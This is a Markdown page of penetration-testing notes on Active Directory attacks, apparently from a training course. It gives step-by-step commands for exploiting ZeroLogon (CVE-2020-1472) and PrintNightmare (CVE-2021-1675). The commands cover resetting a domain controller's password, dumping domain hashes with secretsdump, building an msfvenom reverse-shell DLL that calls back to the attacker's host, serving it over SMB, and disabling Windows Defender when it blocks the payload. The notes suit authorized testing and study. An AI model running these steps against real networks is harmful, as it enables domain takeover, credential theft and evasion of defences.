Skip to content

Latest commit

 

History

History
67 lines (43 loc) · 3.2 KB

21. Additional Active Directory Attacks.md

File metadata and controls

67 lines (43 loc) · 3.2 KB

Additional Active Directory Attacks

Abusing ZeroLogon

  • Make sure to restore if you use this attack, otherwise the domain controller will be broken. You can also use the tester and tell the client in your report (to avoid breaking anything).
  • Clone https://github.com/dirkjanm/CVE-2020-1472
  • https://github.com/SecuraBV/CVE-2020-1472 to copy the tester file zerologon_tester.py
  • All we need for the zero logon tester is the name of the Domain Controller (HYDRA-DC) and the IP address: python3 zerologon_tester.py <DOMAIN CONTROLLER> <DC-IP>
  • Next, to run the exploit all we need to do is use: python3 cve-2020-1472-exploit.py <DOMAIN CONTROLLER> <DC-IP>
  • To check, use secretsdump: secretsdump.py -just-dc <DOMAIN>/<DOMAIN CONTROLLER>\$@<DC-IP>
  • Now to restore, first copy the administrator hash and secretsdump.py administrator@<DC-IP> -hash <hash>. Copy the entire plain_password_hex.
  • Back in the exploit folder run python3 restorepassword.py <DOMAIN>/<DOMAIN CONTROLLER>@<DOMAIN CONTROLLER> -target-ip <DC-IP> -hexpass <password hex>

PrintNightmare (CVE-2021-1675) Walkthrough

PrintNightmare is a critical security flaw found in the Windows Print Spooler service, which manages print jobs sent to printers. It allows an attacker to execute remote code with system-level privileges on affected machines.

For this, we are going to use the resources found here https://github.com/cube0x0/CVE-2021-1675.

To check if our DC is vulnerable to this attack:

rpcdump.py @<DC-IP> | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

If we see the above after hitting ENTER, then the DC is vulnerable.

Before running the exploit, we need to install the latest version of impacket:

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Once that’s done.

Let’s grab the actual exploit https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py. We can copy the actual code, open a text document, paste the code and save it as a python file (Don’t forget to add the .py extension).

Next to generate a malicious dll payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<KALI-IP> LPORT=5555 -f dll > shell.dll.

Since, we’re using msfvenom for the payload….

We’ll start up msfconsole and use exploit/multi/handler for the meterpreter session:

  • set payload windows/x64/meterpreter/reverse_tcp
  • set LPORT 5555
  • set LHOST <KALI-IP>
  • run

Now open up a new terminal window, to set up a smbserver using impacket to host the shell.dll payload:

  • smbserver.py share 'pwd' (Make sure to run this in the same directory as the payload).

Everything is set up. Time to run the exploit.

python3 CVE-2021-1675.py <DOMAIN>/<user>:<pass>@<DC-IP>@<DC-IP> '\\<KALI-IP>\share\shell.dll'

NOTE: If there’s an error, try running smbserver.py with the -smb2support tag. AND if upon running we get a ERROR_VIRUS_INFECTED notification, login into the Domain Controller and disable Windows Defender.

Back in msfconsole, we should a meterpreter shell. We can do anything now such as using the hashdump command to dump the hashes.